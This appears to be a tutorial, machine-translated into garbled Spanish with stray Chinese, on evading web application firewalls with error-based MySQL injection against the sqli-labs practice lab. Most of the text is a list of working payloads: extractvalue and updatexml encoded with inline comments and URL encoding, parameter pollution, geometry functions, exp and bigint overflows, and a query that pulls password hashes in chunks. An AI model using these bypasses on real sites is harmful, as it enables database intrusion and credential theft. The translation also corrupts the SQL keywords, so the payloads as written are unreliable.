De hecho, se administró la inyección es muy fuerte, hay muchos errores de inyección en línea conversación, gramática, pero muy poca gente alrededor para explicar el WAF inyección de error, por lo que hoy tengo un helicóptero pequeño prueba, hablar de mis propios puntos de vista
I basada en mi propia opinión de compartir mis propias derivaciones de inyección de error, vaya nos dejó
Todavía nos basamos en menos-1, la primera es la primera declaración (extractvalue)
Yo quiero principio no elaborado, pero todavía tenemos que entender claramente los principios, o el uso de otra persona cosas
? La primera: http: //127.0.0.1/sql/Less-1/ id = 1 'y extractvalue (1, concat (0x7E, (seleccione la base de datos ()), 0x7E)) - +
Basado WAF, que será algo que filtran sensibles que?
Puede haber comillas simples, y, extractvalue, la base de datos
Luego Dividimos uno por uno
(1) y a la primera asociado IS & && = 26% mediante la codificación de derivación, y entonces se inyecta a la codificación de derivación asociado / *! && * / / * * 26% 26% / / *! 50000 && * / / *! 50000% 26% 26 * /
Esto se basa en el filtrado y la carga útil 127.0.0.1/sql/Less-1/?id=-1 '/ *! 50000% 26% 26 * / extractvalue (1, concat (0x7E, (seleccione la base de datos ()), 0x7E) ) - + // analogía es verdadera o y xor
Toda la inyección de errores y pueden haber sido reemplazados o XOR y cambiar fácilmente el aspecto Sal: sabemos o = || curso o = |
(2) Luego extractvalue, así como nos puede prescindir de ella
La primera es sensible a la derivación extRactvAlue, no es necesariamente el caso, ya que todas las funciones de WAF expresiones regulares están incluidos.
El segundo es los comentarios en línea, comentarios dentro Gong buena, / * 50 000% 26% 26 * / / * 50000extRactvAlue * / (1, concat (0x7E, (Seleccionar base de datos ()), 0x7e)) - !! + .
El tercero es un símbolo especial de derivación,
! 1./*!50000%26%26*/ / * 50000`extRactvAlue` * / (1, concat (0x7E, (seleccione la base de datos ()), 0x7E)) - + nos ayuda derivación de las cotizaciones contra
2./*!50000%26%26*/!!!/*!50000`extRactvAlue`*/(1,concat(0x7e,(select base de datos ()), 0x7E)) - + sobrepasa mediante el uso de exclamación
3.% 0bor% 0b (extractvalue (1, concat (0x7E, (Seleccionar base de datos ()), 0x7e))) - +% 0b a la derivación utilizando
4./*!50000%26%26*/!!!/*!50000`extRactvAlue`*/(1,concat(0x7e,(select base de datos ()), 0x7E)) / * 50000 * / - + seguido por los comentarios en línea
(3) a continuación, que la base de datos
En base a la base de datos de derivación se refiere a mi primer artículo
(4) utilizando el parámetro de derivación contaminación hpp
/ * & Id = 'y (extractvalue (1, concat (0x7E, (seleccione un usuario ()), 0x7E))) - + * / // entonces podremos jugar con el interior de los parámetros de contaminación, todos lo sabemos
Después de este curso, que no conseguimos todo, es normal, ja, ja, ja, y luego el siguiente es necesario utilizar la ley en su conjunto
(1) La primera es el uso de procedimiento de analizar método analítico
Procedimiento Analyse (extractvalue (rand (), concat (0x3a, la base de datos ())), 1) - + // rand () es generar un número aleatorio entre 0 y 1, para la función rand si usted tiene la impresión de que los amigos sin duda pensar está dando el suelo, por supuesto, también podemos añadir que simplemente sobre la base del método de pro
procedimiento% 23% 0aanalyse (/ *! 50000`extractvalue` * / (rand (), `concat` (0x3a, la base de datos / ** / (/ *! * 50000 /))), 1) / *! * 11340 / - + esta derivación, el uso de golpes de combinación
ps esto: cuando nos fijamos en marcha la mesa, desde donde INFORMATION_SCHEMA.TABLES esquema_tabla = 'seguridad' que puede poner la seguridad en un código hexadecimal, porque algunos WAF es sensible a sus propios nombres de las tablas de base de datos. Sí extractvalue updatexml consulta y tienen una limitación de la longitud, la solicitud de contraseña cuando estamos valor MD5, que consulta es hasta el 31, hay un no sé, que Zezheng, tenemos que utilice el método de usar MD5 véase, por ejemplo, tomamos updatexml
longitud + 17 y 32 se toman - y updatexml (1, concat (0x7E, substr ((seleccione md5 (password) de los usuarios limitan 1,1), 17,32), 0x7e), 1)
funciones (2) de conversión, además de nuestro extractvalue inyección de error, hay otras funciones, hay muchas maneras de pasar por alto, queremos flexibles
El segundo: y (seleccione 1 a partir de (select count (*), concat (base de datos (), suelos (rand (0) * 2)) x del grupo INFORMATION_SCHEMA.TABLES por x) a) - + podemos usar baja ¿Qué función de error dado por el método de inyección de derivación a la extractvalue de referencia, he aquí un resumen de
En tercer lugar: y (updatexml (1, concat (0x7E, (seleccione la base de datos ()), 0x7E), 1)) - +
En cuarto lugar, y GeometryCollection ((SELECT * FROM (SELECT * FROM (seleccione la base de datos ()) a) b)) - + // 456789 tarde se cambió el mismo, sólo el nombre de la función
第五 个: y multipunto ((SELECT * FROM (SELECT * FROM (seleccione la base de datos ()) a) b)) - +
第六 个: y polígono ((SELECT * FROM (SELECT * FROM (seleccione la base de datos ()) a) b)) - +
第七 个: y varios polígonos ((SELECT * FROM (SELECT * FROM (seleccione la base de datos ()) a) b)) - +
第八 个: y cadena lineal ((SELECT * FROM (SELECT * FROM (SELECT base de datos ()) a) b)) - +
第九 个: y multilínea ((SELECT * FROM (SELECT * FROM (SELECT base de datos ()) a) b)) - +
PS: No he dicho estas funciones a la derivación de la carga útil, porque leído con atención lo que escribí de derivación extractvalue, son comunes a la otra función de error, debido a que el nuevo nombre, es importantes modificaciones, está buscando WAF el método con el que una función de filtro, se trata de lo que estamos por la esencia de la WAF
Décima: y exp (~ (seleccionar * de (Seleccionar base de datos ()) a)) - + // exp dada usando el punto de inyección de detección de conexión anterior, 1-exp (11111) el punto de inyección se determina basándose en este principio
y `!!! exp` (~ (SELECT * FROM (SELECT (base de datos)) a)) - // + exp puede invertidas
Undécima: union select (! (SELECT * FROM (seleccione la base de datos ()) x) - ~ 0), 2,3 - + // uso bigint dado, union select se puede omitir
Duodécima: o 1 grupo por CONCAT_WS (0x7E, base de datos (), suelos (rand (0) * 2)) que tiene min (0) o 1 - + modificación piso
Por supuesto, mi conclusión es sólo unilateral, si queremos ser más fuerte, puede leer más artículos, manuales especializado en MySQL, y el aprendizaje de por vida